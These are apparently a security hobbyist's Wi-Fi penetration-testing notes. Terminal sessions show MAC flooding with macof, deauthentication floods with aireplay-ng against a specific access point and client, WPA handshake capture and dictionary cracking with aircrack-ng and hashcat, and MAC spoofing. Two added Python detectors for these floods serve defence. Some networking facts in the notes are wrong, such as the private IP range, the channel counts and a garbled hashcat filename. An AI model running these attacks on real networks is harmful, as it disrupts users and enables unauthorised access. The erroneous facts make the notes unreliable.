Wi-Fi Penetration Testing (💀: Wireless Network Hacking)
What you will learn?
1. What is Wi-Fi
2. History of Wi-Fi
3. How Wi-Fi works
4. Types of wireless threats
5. Wireless hacking methodology
1. What is Wi-Fi
Wireless technology
Connecting devices to the internet
Transmitting radio signals as data using a router
The router is connected to the internet using a wire / cable
Works on channels
2. History of Wi-Fi
Wireless security protocols
3. How Wi-Fi works
Range → From 192.168.1.0 to 255.255.255.255
Router
Public
Private (198.168.0.1): find the IP
MAC
ARP ⇒ Address Resolution Protocol
4. Types of wireless threats
Denial of Service
De-authentication flood
Routing attack
Access point theft
Disassociation attack
EAP-failure
Beacon flood
Authentication flood
ARP cache poisoning attack
Power saving attacks
TKIP MIC exploit
5. Wireless hacking methodology
Wi-Fi discovery
GPS mapping
Wireless traffic analysis
Launch the Wi-Fi attack
Compromise the Wi-Fi network
Wi-Fi important concepts
Wi-Fi operating modes
1. Monitor mode
2. Managed mode
Wi-Fi channels
Wi-Fi frequency
Small bands
Medium to communicate
2.4 GHz = 11 channels
5 GHz = 45 channels
Wi-Fi major concerns and dangers
1. Security
2. Small
3. Health concerns
4. Limited bandwidth
5. Speed
DoS on Wi-Fi
What you will learn
1. What is a DoS attack
2. How does it work?
3. MAC flooding
4. Discovery flooding
5. De-auth flooding
3. MAC Flooding
Tools
┌──(hacking㉿windows)-[~]
└─$ macof --help
macof: invalid option -- '-'
Version: 2.4
Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport]
             [-i interface] [-n times]
* netdiscover
┌──(hacking㉿windows)-[~]
└─$ iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     unassociated  ESSID:""  Nickname:"<WIFI@REALTEK>"
          Mode:Managed  Frequency=2.412 GHz  Access Point: Not-Associated
          Sensitivity:0/0
          Retry:off   RTS thr:off   Fragment thr:off
          Power Management:off
          Link Quality:0  Signal level:0  Noise level:0
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
┌──(root㉿windows)-[/home/hacking]
└─# macof -i wlan0 -s 192.168.1.255
27:7b:c:7a:f5:7b 38:d7:12:44:60:28 192.168.1.255.5148 > 0.0.0.0.61071: S 1065463207:1065463207(0) win 512
f3:1a:be:20:3c:ac 8f:4a:e6:65:1a:fd 192.168.1.255.47474 > 0.0.0.0.36439: S 1392898891:1392898891(0) win 512
fa:71:f:2a:88:6a 9a:c7:bb:5:ce:cf 192.168.1.255.64664 > 0.0.0.0.52315: S 1205853576:1205853576(0) win 512
e5:4:97:52:a7:7e 15:5e:dc:5a:b4:29 192.168.1.255.46311 > 0.0.0.0.50431: S 964289218:964289218(0) win 512
a5:49:76:f:cd:a 5f:d4:f4:24:31:11 192.168.1.255.42384 > 0.0.0.0.49574: S 1572234722:1572234722(0) win 512
e9:f4:2f:6:ef:d1 42:95:2:3c:4e:f2 192.168.1.255.15309 > 0.0.0.0.16292: S 2054800207:2054800207(0) win 512
d3:2c:6a:f:24:8a ba:a:17:74:5f:a 192.168.1.255.32121 > 0.0.0.0.50001: S 572188985:572188985(0) win 512
b0:e4:88:13:53:d0 93:18:fe:74:63:84 192.168.1.255.6238 > 0.0.0.0.64950: S 1517543469:1517543469(0) win 512
e3:23:64:7f:47:7c 4:fc:6f:26:3b:2e 192.168.1.255.62564 > 0.0.0.0.32639: S 1179820892:1179820892(0) win 512
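The defender's view of the macof output above: each line carries a different, randomly generated source MAC, which is what exhausts a switch's CAM table. This added Python example (not from the original notes) parses that one-line summary format, normalises macof's unpadded MAC octets, and flags when one ingress point shows more distinct source MACs than an access port should learn. The sample lines and the learning limit are constructed.

```python
"""Detect a MAC-flooding burst in macof-style L2 summaries.

Added example, not part of the original notes. It parses the one-line format
the notes show for macof ("src_mac dst_mac src_ip.port > dst_ip.port: ...") and
flags when one ingress point shows more distinct source MACs than a switch port
should ever learn. Sample lines and the learning limit are constructed.
"""
import re

# macof prints octets without zero padding ("fa:71:f:2a:88:6a"): accept 1-2 hex digits.
MAC = r"(?:[0-9a-fA-F]{1,2}:){5}[0-9a-fA-F]{1,2}"
LINE = re.compile(rf"^({MAC})\s+({MAC})\s+(\S+)\s+>\s+(\S+):")

LEARN_LIMIT = 8   # constructed: how many source MACs one access port may learn (port-security style)

def normalize_mac(mac):
    """Zero-pad octets so '27:7b:c:7a:f5:7b' and '27:7B:0C:7A:F5:7B' compare equal."""
    return ":".join(f"{int(octet, 16):02x}" for octet in mac.split(":"))

def parse_summary(line):
    """Return (src_mac, dst_mac, src_endpoint, dst_endpoint) or None for non-matching lines."""
    m = LINE.match(line.strip())
    if not m:
        return None
    src, dst, src_ep, dst_ep = m.groups()
    return normalize_mac(src), normalize_mac(dst), src_ep, dst_ep

def distinct_sources(lines):
    """Set of normalized source MACs seen across the summary lines."""
    return {rec[0] for rec in map(parse_summary, lines) if rec}

def mac_flood_suspected(lines, limit=LEARN_LIMIT):
    """True when more distinct source MACs appear than the port is allowed to learn."""
    return len(distinct_sources(lines)) > limit

def constructed_lines(n):
    """n macof-style lines, each with a different unpadded source MAC (constructed data)."""
    return [f"{i:x}:7b:c:7a:f5:{i:x} 38:d7:12:44:60:28 192.168.1.255.{5000 + i} "
            f"> 0.0.0.0.61071: S 1:1(0) win 512" for i in range(n)]

if __name__ == "__main__":
    # Normal traffic: many frames, but all from the one MAC plugged into the port.
    normal = ["08:0:27:55:98:e5 ff:ff:ff:ff:ff:ff 192.168.1.1.68 > 255.255.255.255.67: ..."] * 50
    print("normal traffic flood?", mac_flood_suspected(normal))              # False
    print("macof burst flood?", mac_flood_suspected(constructed_lines(64)))  # True
```

On managed switches the same idea is enforced in hardware by port security (a per-port MAC learning limit that shuts or rate-limits the port when exceeded), which is the mitigation for this attack class.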
4. Discovery Flooding
┌──(root㉿windows)-[/home/hacking]
└─# yersinia
GNU yersinia 0.8.2 Tool
Try 'yersinia -h' to display the help.
┌──(root㉿windows)-[/home/hacking]
└─# yersinia -G
5. De-auth Flooding
┌──(root㉿windows)-[/home/hacking]
└─# iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11bgn  ESSID:"\xF0\x9F\x91\xBD Security Machine \xF0\x9F\x91\xBD\xF0\x9F\x98\xB1"  Nickname:"<WIFI@REALTEK>"
          Mode:Managed  Frequency:2.437 GHz  Access Point: FE:0A:1A:7F:98:1B
          Bit Rate:87 Mb/s   Sensitivity:0/0
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:****-****-****-****-****-****-****-****   Security mode:open
          Power Management:off
          Link Quality=100/100  Signal level=68/100  Noise level=0/100
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig wlan0 down
┌──(root㉿windows)-[/home/hacking]
└─# iwconfig wlan0 mode monitor
┌──(root㉿windows)-[/home/hacking]
└─# iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
wlan0     IEEE 802.11bgn  ESSID:"\xF0\x9F\x91\xBD Security Machine \xF0\x9F\x91\xBD\xF0\x9F\x98\xB1"  Nickname:"<WIFI@REALTEK>"
          Mode:Monitor  Frequency:2.437 GHz  Access Point: FE:0A:1A:7F:98:1B
          Sensitivity:0/0
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=1/100  Signal level=1/100  Noise level=0/100
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig wlan0 up
┌──(root㉿windows)-[/home/hacking]
└─# airodump-ng wlan0
CH 11 ][ Elapsed: 1 min ][ 2023-10-29 21:20
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID
FE:0A:1A:7F:98:1B  -21      114        3    0   6  180   WPA2 CCMP    PSK   👽 Security Machine 👽😱
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
FE:0A:1A:7F:98:1B  34:6F:24:C9:79:7D  -17   1e- 1e    11        16
Quitting...
* Copy the BSSID
┌──(root㉿windows)-[/home/hacking]
└─# cd Desktop
┌──(root㉿windows)-[/home/hacking/Desktop]
└─# airodump-ng wlan0 --bssid FE:0A:1A:7F:98:1B --channel 6 --write wifitest
21:26:34  Created capture file "wifitest-01.cap".
CH  6 ][ Elapsed: 2 mins ][ 2023-10-29 21:29
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID
FE:0A:1A:7F:98:1B  -17   0      234        5    0   6  180   WPA2 CCMP    PSK   👽 Security Machine 👽😱
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
FE:0A:1A:7F:98:1B  34:6F:24:C9:79:7D  -21    0 - 1e     0        24
┌──(root㉿windows)-[/home/hacking/Desktop]
└─# aireplay-ng --deauth 100 -a FE:0A:1A:7F:98:1B -c 34:6F:24:C9:79:7D wlan0
21:31:53  Waiting for beacon frame (BSSID: FE:0A:1A:7F:98:1B) on channel 6
21:31:54  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [17|62 ACKs]
21:31:55  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [ 0|64 ACKs]
21:31:56  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [15|65 ACKs]
21:31:57  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [ 0|63 ACKs]
21:31:58  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [20|65 ACKs]
21:31:58  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [ 0| 0 ACKs]
21:32:00  Sending 64 directed DeAuth (code 7). STMAC: [34:6F:24:C9:79:7D] [ 8| 1 ACKs]
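What the aireplay-ng run above looks like from the monitoring side: 64 deauthentication frames per second, all with reason code 7, all claiming to come from the AP and addressed to one station. This added Python example (not from the original notes) buckets deauth/disassoc frames per second and per (source, destination) pair so that a single legitimate deauth stays quiet while a burst of this shape is flagged. The frame records are constructed; the BSSID and station MAC are the ones shown in the notes' airodump-ng output.

```python
"""Deauthentication-flood detector for 802.11 management frames.

Added example, not part of the original notes. It assumes frames were captured
in monitor mode and reduced to (timestamp, subtype, src, dst, reason_code)
tuples; the sample below is constructed, not captured traffic.
"""
from collections import Counter

DEAUTH, DISASSOC, BEACON = 12, 10, 8       # IEEE 802.11 management frame subtypes
FLOOD_THRESHOLD = 10                        # deauth/disassoc per (src, dst) per second

AP = "FE:0A:1A:7F:98:1B"                    # BSSID from the notes' airodump-ng output
STA = "34:6F:24:C9:79:7D"                   # station seen associated to that BSSID

def constructed_frames():
    """Benign beacons, one legitimate deauth, then a 64-frame directed burst."""
    frames = [(1698591000.0 + i, BEACON, AP, "FF:FF:FF:FF:FF:FF", 0) for i in range(20)]
    frames.append((1698591005.5, DEAUTH, AP, STA, 3))            # STA leaving (reason 3)
    frames += [(1698591113.0 + i / 64, DEAUTH, AP, STA, 7) for i in range(64)]
    return frames

def detect_deauth_flood(frames, threshold=FLOOD_THRESHOLD):
    """Return alerts (second, src, dst, count, reason_codes) for bursts over threshold.

    Bucketing by whole second per (src, dst) pair keeps a legitimate single
    deauth below the threshold while a tool sending dozens per second is not.
    The source address is unauthenticated, so 'src' is what the frame claims.
    """
    buckets = Counter()
    reasons = {}
    for ts, subtype, src, dst, reason in frames:
        if subtype not in (DEAUTH, DISASSOC):
            continue
        key = (int(ts), src, dst)
        buckets[key] += 1
        reasons.setdefault(key, set()).add(reason)
    return sorted(
        (sec, src, dst, n, sorted(reasons[(sec, src, dst)]))
        for (sec, src, dst), n in buckets.items() if n >= threshold
    )

if __name__ == "__main__":
    for sec, src, dst, n, codes in detect_deauth_flood(constructed_frames()):
        print(f"{sec}: {n} deauth/disassoc {src} -> {dst}, reason codes {codes}")
```

Detection is the fallback; the mitigation is 802.11w Protected Management Frames (mandatory in WPA3), under which a client discards deauth/disassoc frames that lack a valid integrity check, so a spoofed burst like this is logged but not honoured.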
Wi-Fi Password Cracking
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig wlan0 down
┌──(root㉿windows)-[/home/hacking]
└─# iwconfig wlan0 mode monitor
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig wlan0 up
┌──(root㉿windows)-[/home/hacking/Desktop]
└─# airodump-ng wlan0
CH  8 ][ Elapsed: 30 s ][ 2023-10-29 21:39
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID
FE:0A:1A:7F:98:1B  -16       51        1    0   6  180   WPA2 CCMP    PSK   👽 Security Machine 👽😱
0C:0E:76:4D:71:54  -50       38        0    0   1  130   WPA2 CCMP    PSK   🧟 Security Machine 😎🧟
46:D5:F2:2C:D4:6D  -24       31        0    0   1   65   WPA2 CCMP    PSK   Nj 5G
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
FE:0A:1A:7F:98:1B  34:6F:24:C9:79:7D  -21   1e- 1e     0         2
Quitting...
┌──(root㉿windows)-[/home/hacking/Desktop/wifi test]
└─# airodump-ng --bssid FE:0A:1A:7F:98:1B --channel 6 wlan0 --write test
* WPA handshake capture (disconnect one device)
┌──(root㉿windows)-[/home/hacking]
└─# aireplay-ng --deauth 100 -a FE:0A:1A:7F:98:1B -c 84:26:BD:50:2D:A0 wlan0
21:53:51  Waiting for beacon frame (BSSID: FE:0A:1A:7F:98:1B) on channel 6
21:53:52  Sending 64 directed DeAuth (code 7). STMAC: [84:26:BD:50:2D:A0] [ 7|34 ACKs]
21:53:53  Sending 64 directed DeAuth (code 7). STMAC: [84:26:BD:50:2D:A0] [25| 0 ACKs]
21:53:53  Sending 64 directed DeAuth (code 7). STMAC: [84:26:BD:50:2D:A0] [ 0| 0 ACKs]
Password cracking with the handshake file
┌──(root㉿windows)-[/home/hacking/Desktop/wifi test]
└─# aircrack-ng test-01.cap -w /home/hacking/Desktop/rockyou.txt
Reading packets, please wait...
Opening test-01.cap
Read 18938 packets.
Wi-Fi Spoofing, IP Spoofing
┌──(root㉿windows)-[/home/hacking]
└─# netdiscover
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig eth0 192.168.1.1
┌──(root㉿windows)-[/home/hacking]
└─# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.1  netmask 255.255.255.0  broadcast 192
        inet6 2401:4900:3854:d822:d762:e136:6a72:a105  prefixl
        inet6 fe80::a00:27ff:fe55:98e5  prefixlen 64  scopeid
        inet6 2401:4900:3854:d822:a00:27ff:fe55:98e5  prefixle
        ether 08:00:27:55:98:e5  txqueuelen 1000  (Ethernet)
        RX packets 700  bytes 409738 (400.1 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 55266  bytes 3344829 (3.1 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisio
MAC Spoofing
┌──(root㉿windows)-[/home/hacking]
└─# macchanger -m fe:0a:1a:7f:98:1b eth0
Wi-Fi MITM attack
https://github.com/ghostop14/sparrow-wifi
┌──(hacking㉿windows)-[~/Desktop/sparrow-wifi]
└─$ sudo sparrow-wifi
QStandardPaths: XDG_RUNTIME_DIR not set, defaulting to '/tmp/
Error updating the MAC address database. Please check if the
📶 Wi-Fi AngryOxide tools
https://github.com/Ragnt/AngryOxide
┌──(root㉿windows)-[/home/hacking]
└─# angryoxide -h
Does awesome things... with wifi.

Usage: angryoxide [OPTIONS] --interface <INTERFACE>

Options:
  -i, --interface <INTERFACE>  Interface to use
  -c, --channel <CHANNEL>      Optional - Channel to scan. Will use "-c 1 -c 6 -c 11" if none specified
  -b, --band <BAND>            Optional - Entire band to scan - will include all channels interface can support
  -t, --target <TARGET>        Optional - Target (MAC or SSID) to attack - will attack everything if none specified
  -w, --whitelist <WHITELIST>  Optional - Whitelist (MAC or SSID) to NOT attack
  -r, --rate <RATE>            Optional - Attack rate (1, 2, 3 || 3 is most aggressive) [default: 2]
  -o, --output <OUTPUT>        Optional - Output filename
      --combine                Optional - Combine all hc22000 files into one large file for bulk processing
      --noactive               Optional - Disable Active Monitor mode
      --rogue <ROGUE>          Optional - Tx MAC for rogue-based attacks - will randomize if excluded
      --gpsd <GPSD>            Optional - Alter default HOST:Port for GPSD connection [default: 127.0.0.1:2947]
      --autohunt               Optional - AO will auto-hunt all channels then lock in on the ones targets are on
      --headless               Optional - Set the tool to headless mode without a UI. (useful with --autoexit)
      --autoexit               Optional - AO will auto-exit when all targets have a valid hashline
      --notransmit             Optional - Do not transmit - passive only
      --nodeauth               Optional - Do NOT send deauths (will try other attacks only)
      --notar                  Optional - Do not tar output files
  -h, --help                   Print help
  -V, --version                Print version
┌──(root㉿windows)-[/home/hacking]
└─# angryoxide -i wlan0 --nodeauth --notransmit
┌──(root㉿windows)-[/home/hacking]
└─# angryoxide -i wlan0 -t Nj5G
┌──(root㉿windows)-[/home/hacking]
└─# hashcat -m 22000 nj,hc2200 wordlistfile
RAHUL-Nj
www.linkedin.com
https://www.linkedin.com/in/rahul-kumar-ceh/
RAHUL-Nj - Overview
👍 I'm an Ethical Hacker 😎 - An Independent Security Researcher who loves ❤️ to find security loopholes 🔐 and patch them by reporting 🔁 - RAHUL-Nj
https://github.com/RAHUL-Nj